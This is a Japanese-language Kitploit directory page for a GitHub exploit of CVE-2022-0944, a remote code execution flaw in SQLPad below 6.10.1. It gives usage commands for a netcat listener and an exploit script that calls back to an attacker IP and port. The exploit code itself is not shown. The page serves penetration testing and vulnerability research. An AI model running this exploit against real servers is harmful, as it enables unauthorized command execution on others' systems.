Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/0xroqeeb/sqlpad-rce-exploit-cve-2022-0944
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHub0xroqeeb/sqlpad-rce-exploit-cve-2022-0944

sqlpad-rce-exploit-CVE-2022-0944

CVE-2022-0944のPythonエクスプロイトで、SQLPadの/api/test-connectionエンドポイントを介してnetcatコールバックでブラインドリモートコード実行を可能にします。

リポジトリを見る
92121年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

SQLPad RCE エクスプロイト

このリポジトリには、SQLPad の CVE-2022-0944 に関するエクスプロイトスクリプトが含まれています。この脆弱性は、/api/test-connection エンドポイントを介したリモートコード実行 (RCE) を可能にします。

概要

提供されたスクリプト (exploit.py) は、SQLPad の RCE 脆弱性を悪用する方法を示しています。このスクリプトは、脆弱なエンドポイントにペイロードを送信し、ターゲットサーバー上でコマンドを実行します。

特徴

  • ブラインド RCE: 直接応答を受け取らずに、ターゲットサーバー上でコマンドを実行します。
  • Netcat リスナー: 出力を受信するために、攻撃者のマシンに netcat リスナーをセットアップする必要があります。

前提条件

  • Python 3.x
  • requests ライブラリ (pip でインストール可能)

使用方法

  1. Netcat リスナーをセットアップする
root@kitploit:~
nc -lvnp 4444

エクスプロイトを実行する

root@kitploit:~
python exploit.py <sqlpad_url> <attacker_ip> <attacker_port>

影響を受けるバージョン

  • 6.10.1 未満

参考文献

  • Huntr - CVE-2022-0944
  • NVD - CVE-2022-0944
ツールをダウンロード